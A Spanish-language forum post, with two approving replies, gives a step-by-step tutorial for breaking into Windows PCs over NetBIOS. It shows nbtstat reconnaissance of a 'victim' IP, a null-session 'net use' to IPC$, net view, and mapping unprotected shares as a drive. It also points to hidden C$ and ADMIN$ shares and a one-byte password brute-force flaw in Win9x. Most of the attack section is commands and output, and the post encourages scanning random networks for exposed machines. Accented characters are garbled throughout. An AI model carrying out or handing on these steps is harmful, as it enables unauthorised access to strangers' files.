Algo que... Ya pas? de moda, pero una forma de aprender nuevas tecnicas. Para saber mejor como es que funciona una red, y cuales son los comandos b?sicos. ?NETBIOS? NETBIOS (Network Basic Output/Input System que en espa?ol Sistema B?sico de Red Entrada/Salida) es el protocolo que se encarga de compartir los archivos y las impresoras entre varios ordenadores. Tal vez habr?s o?do mencionar alguna vez el NETBEUI (NetBIOS Extended User Interface o Interfaz de Usuario Extendido),pues bien, es lo mismo pero NETBIOS lo desarrollaron IBM y Sytek, y NETBEUI lo desarrollo microsoft, tratando de optimizar el NETBIOS para Windows. Es habitual o?r hablar simplemente del "139" este es el puerto por el que funciona este protocolo, el 137 y el 138 tambi?n forman parte de este protocolo, NetBIOS-ns 137 TCP / UDP NetBIOS Name Service NetBIOS-dgm 138 TCP / UDP NetBIOS Datagram Service NetBIOS-ssn 139 TCP / UDP NetBIOS Session Service Para poder comprobar este ataque con ?xito debes tener instalado el protocolo en tu PC, para ello, si tienes Windows 95 / 98 /Me debes ir a INICIO \ CONFIGURACION \ PANEL DE CONTROL \ RED e instalar el cliente para redes Microsoft, el protocolo TCP/IP y activar "Compartir archivos e impresoras", si utilizas el Windows NT4 / 2000 / XP debes hacer lo mismo pero, en estos sistemas se hace en cada conexi?n a Internet por separado (s?lo necesitas activarlo en aquella que vayas a utilizar para el ataque. ENTRANDO POR NETBIOS Lo que se explica a continuaci?n se puede utilizar desde un windows para atacar otro windows, aunque el ataque est? pesado para NT ser?a muy similar si quisi?ramos atacar un Windows 9x, pero no voy a entrar en muchos detalles, porque debido a que hoy en d?a existen maneras mas f?ciles y r?pidas de hacerlo, esta secci?n la he puesto s?lo como curiosidad. Una vez elegida la m?quina a la que quieres entrar solo necesitas el Ms-Dos, o el S?mbolo de Sistema, que para el caso es lo mismo, pues bien abres una ventana y escribes: nbtstat -A 192.168.0.1 (si lo que conoces es la IP de la victima) nbtstat -a nombre_del_PC (si conoces solo su nombre) pueden ocurrir varias cosas, si recibes: C:\WINDOWS>nbtstat -A 192.168.0.1 Host not found. Pues queda claro que "not found" , o no est? conectado, o no comparte archivos, o no existe (mira a ver si lo escribiste bien) Si la respuesta es: C:\WINDOWS>nbtstat -A 192.168.0.1 NetBIOS Remote Machine Name Table Name Type Status -------------------------------------------------------------- NAME <00> UNIQUE Registered WORKGROUP <00> GROUP Registered NAME <03> UNIQUE Registered MAC Address = 00-00-00-00-00-00 Pues aunque parezca mejor, para el caso nos da igual, porque aunque si lo tiene instalado, no comparte nada. Si recibimos: C:\WINDOWS>nbtstat -A 192.168.0.1 NetBIOS Remote Machine Name Table Name Type Status ---------------------------------------------------------------- NAME <00> UNIQUE Registered WORKGROUP <00> GROUP Registered NAME <03> UNIQUE Registered NAME <20> UNIQUE Registered WORKGROUP <1E> GROUP Registered MAC Address = 00-00-00-00-00-00 En este si... la diferencia importante es el <20> que corresponde al "File Server Service" (Servicio servidor de archivos), solo los PC que tienen el <20> tienen archivos compartidos y accesibles. El IPC$ (Inter-Process Communication) es un recurso compartido oculto est?ndar en una m?quina NT , y es utilizado por el servidor para establecer comunicaci?n con otros equipos. Conect?ndose al IPC$ un intruso puede establecer una comunicaci?n valida con el servidor NT. Conect?ndose como null, el intruso puede establecer dicha comunicaci?n sin necesidad de introducir userassword. Para ello se utiliza el siguiente comando: c:\>net use \\[ip_de_la_v?ctima]\ipc$ "" /user:"" The command completed successfully. Puedes ver qu? comparte esa computadora sin necesidad de entrar, para ello utiliza el comando NET C:\>net view \\192.168.0.1 recibir?s algo as?: Shared resources at 192.168.0.1 Share name Type Used as Comment ---------------------------------------------------- NETLOGON Disk Logon server share Test Disk The command completed successfully. Es posible que ocurra: C:\>net view \\192.168.0.1 System error 5 has occurred. Entonces primero tienes que establecer la "null session" C:\>net use \\192.168.0.1\ipc$ "" /user:"" The command completed successfully. Ahora el C:\>net view \\192.168.0.1 si funcionar? Para conectar a la carpeta compartida. The command completed successfully. Si escribes net use ahora, recibir?s algo as?: Status Local Remote Network ------------------------------------------------------------- OK X: \\123.123.123.123\test Microsoft OK \\123.123.123.123\test Microsoft The command completed successfully. Para acceder directamente al PC solo tienes que: *escribir en el expl?rer \\192.168.0.1 *INICIO / EJECUTAR y poner lo mismo \\192.168.0.1 *Bot?n derecho en Mis Sitios de Red > Buscar Equipos... y lo mismo 192.168.0.1 *En una ventana de s?mbolo de sistema escribir: C:\>net use x: \\192.168.0.1\test y despu?s C:\>dir x: Este ataque solo funcionar? si la carpeta compartida no tiene pasword. Recuerda que un intruso no est? limitado a los recursos compartidos que aparecen con el net view. Un intruso que conozca NT sabe que existen otros recursos compartidos ocultos para uso administrativo . Por defecto NT crea el IPC$ y otro por cada partici?n (por ejemplo una m?quina que tiene C, D, y E tendr? sus correspondient es C$, D$, y E$). Tambi?n hay un ADMIN$ que pertenece a la ruta donde fue instalado el NT (por ejemplo si instalaste NT en C:\winnt, entonces ADMIN$ apunta exactamente a esa parte del disco). CRAKEANDO LOS PASSWORDS ----[esta parte est? tomada del grupo DeepZone Digital Security]---- El 24 de agosto del 2000 NS-FOCUS - http://www.nsfocus.com/ - hac?a p?blica una vulnerabilidad en la implementaci?n del protocolo NETBIOS en todos los sistemas operativos corriendo el kernel 9x de la empresa Microsoft (tm), incluyendo el nuevo Windows ME y las versiones m?s avanzadas de Windows 98. La vulnerabilidad en si misma no es m?s que un error de implementaci?n a la hora de establecer la longitud del password para validarlo ante una petici?n NETBIOS. Los sistemas vulnerables obtienen el n?mero de bytes a comparar para el password del paquete que reciben del cliente. Un usuario malicioso podr?a establecer la longitud del password a 1 byte intentar un ataque por fuerza bruta contra el password compartido. El n?mero de intentos que deber?a realizar ser?a tan s?lo de 256 (2 elevado a . El exploit que proporciona NS-FOCUS en su WEB modifica el cliente de samba en su versi?n 2.0.6 para atacar los recursos compartidos de un sistema vulnerable. METODO R?PIDO Hoy en d?a ya no se usa todo ese m?todo de introducir los comandos, han surgido muchas utilidades que automatizan todo el proceso. Si no est?s detr?s de ning?n PC en concreto, y lo que quieres es probar todas estas cosas con un PC aleatorio (por supuesto, sin ?nimo de causar ning?n da?o) lo ?nico que necesitas es elegir un escaneador adecuado ,es decir, de NetBIOS, o al menos un escaneador de puertos apuntando al 139, despu?s escanear una red, y ver?s como empiezan a surgir muchos mas ordenadores mal protegidos, o desprotegidos de los que te imaginas. - Sinceramente no creo que si intentan hacer algo as? valla a funcionar, a menos que sea contra... Windows 9x. Igualmente, se que es f?cil de entender y que van a aprender un poco mas Suerte !. By Unish. ------><-----
Muy Buena informacion men...algunas cosillas no las sabia...y estamos probando...XD Uno habitualmente deja esto de lado...siendo que es muy efectivo...ahunq para xp hay otras alternativas...jejejejje Saludos
xD..se!. pero si no tiene activado el netbio el otro pc,,jodimos!!!...py para peor parece que por defecto viene desactivado!